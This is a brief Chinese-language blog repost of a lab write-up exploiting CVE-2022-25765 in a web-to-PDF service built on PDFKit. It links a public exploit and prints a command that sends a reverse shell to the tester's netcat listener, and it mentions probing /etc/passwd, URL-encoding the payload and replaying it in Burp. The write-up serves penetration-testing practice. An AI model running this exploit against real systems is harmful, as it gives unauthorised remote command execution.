CVE-2022–25765-PDFKit命令执行

admin 2024年9月6日12:30:24评论32 views字数 318阅读1分3秒阅读模式

命令执行

01

CVE-2022-25765

今天打靶机的时候,遇到一个站点,功能是可以把网页转化为PDF的站点,尝试包含/etc/passwd的时候报错了:

CVE-2022–25765-PDFKit命令执行

根据PDFKit搜索EXP,发现了一个命令执行的EXP

link:https://www.exploit-db.com/exploits/51293python3 CVE-202225765.py -s you_kali_nc_listen 80 -w http://192.168.x.x:3000/ -p pdf

CVE-2022–25765-PDFKit命令执行

将payload进行URL编码,放到BP里面重放攻击,然后kali监听80端口:

CVE-2022–25765-PDFKit命令执行

突破边界:

CVE-2022–25765-PDFKit命令执行

原文始发于微信公众号(道玄网安驿站):CVE-2022–25765-PDFKit命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月6日12:30:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022–25765-PDFKit命令执行https://cn-sec.com/archives/3137476.html

发表评论

匿名网友 填写信息